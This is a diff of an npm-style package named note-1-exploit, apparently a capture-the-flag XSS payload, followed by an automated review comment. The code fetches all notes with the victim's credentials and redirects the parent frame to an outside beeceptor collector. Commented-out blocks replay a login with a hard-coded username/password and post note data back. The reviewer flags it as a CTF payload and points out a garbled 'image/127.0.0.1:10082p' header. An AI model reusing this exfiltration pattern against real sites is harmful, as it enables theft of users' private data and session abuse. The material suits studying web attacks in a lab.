note-1-exploit 1.0.18 → 1.0.19
- package/index.js +52 -16
- package/package.json +1 -1
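--- a/package/index.js
+++ b/package/index.js
@@ -1,27 +1,63 @@
 async function exploit() {
 let all_results = await fetch("http://web/api/notes/all", {
+"headers": {
+"accept": "*/*",
+"accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
+"sec-gpc": "1"
+},
+"referrer": "http://127.0.0.1:10082/",
+"referrerPolicy": "strict-origin-when-cross-origin",
+"body": null,
 "method": "GET",
 "mode": "cors",
 "credentials": "include"
 }).then(res => res.text());
 // let json_results = await all_results.json();
 // let note_name = (Math.random() + 1).toString(36).substring(7);
-window.parent.location.replace("https://omniman.free.beeceptor.com?q="
-//
-
-
-
-
-
-
-
-
-
-
-
-
-
-//
+window.parent.location.replace("https://omniman.free.beeceptor.com?q=hahahaha")
+// await fetch("http://127.0.0.1:10082/login", {
+// "headers": {
+// "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/127.0.0.1:10082p,image/apng,*/*;q=0.8",
+// "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
+// "cache-control": "max-age=0",
+// "content-type": "application/x-www-form-urlencoded",
+// "sec-gpc": "1",
+// "upgrade-insecure-requests": "1"
+// },
+// "referrer": "http://127.0.0.1:10082/login",
+// "referrerPolicy": "strict-origin-when-cross-origin",
+// "body": "username=nnnddd&password=nnnddd",
+// "method": "POST",
+// "mode": "cors",
+// "redirect": "follow",
+// "credentials": "include"
+// });
+// await fetch("http://127.0.0.1:10082/login", {
+// "headers": {
+// "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/127.0.0.1:10082p,image/apng,*/*;q=0.8",
+// "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
+// "cache-control": "max-age=0",
+// "content-type": "application/x-www-form-urlencoded",
+// "sec-gpc": "1",
+// "upgrade-insecure-requests": "1"
+// },
+// "referrer": "http://127.0.0.1:10082/login",
+// "referrerPolicy": "strict-origin-when-cross-origin",
+// "body": "username=nnnddd&password=nnnddd",
+// "method": "POST",
+// "mode": "cors",
+// "redirect": "follow",
+// "credentials": "include"
+// });
+// await fetch("http://127.0.0.1:10082/api/notes", {
+// "headers": {
+// "accept": "*/*",
+// "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
+// "content-type": "application/json",
+// "sec-gpc": "1"
+// },
+// "referrer": "http://127.0.0.1:10082/",
+// "referrerPolicy": "strict-origin-when-cross-origin",
 // "body": "{\"title\":\"" + note_name + "\",\"content\":\"" + json_results[0].id + "\"}",
 // "method": "POST",
 // "mode": "cors",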
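Review bot: `all_results` is awaited with `credentials: "include"` against `http://web/api/notes/all` but never read on the new side — the `replace` call on new line 17 sends the fixed literal `q=hahahaha` — so the authenticated fetch is now dead code and should be removed rather than left as an unfinished step; what remains still navigates the top-level frame (`window.parent.location.replace`) to a third-party beeceptor collector, so this package is a CTF payload and must never be installed outside that harness. The commented-out blocks added on new lines 18–60 ship a hard-coded credential pair (`username=nnnddd&password=nnnddd`, twice) and a find/replace artifact in the `accept` header — `image/127.0.0.1:10082p` is evidently a mangled `image/webp` — and should be deleted from the published file. The live fetch targets host `web` while its `referrer` is `http://127.0.0.1:10082/`, which looks like two environments mixed together; a cross-origin `referrer` in a fetch init is ignored (older engines threw a TypeError), so the harness host should be confirmed and the stale option dropped. The body of `exploit` continues past the end of the hunk, so its closing and any further steps were not reviewed.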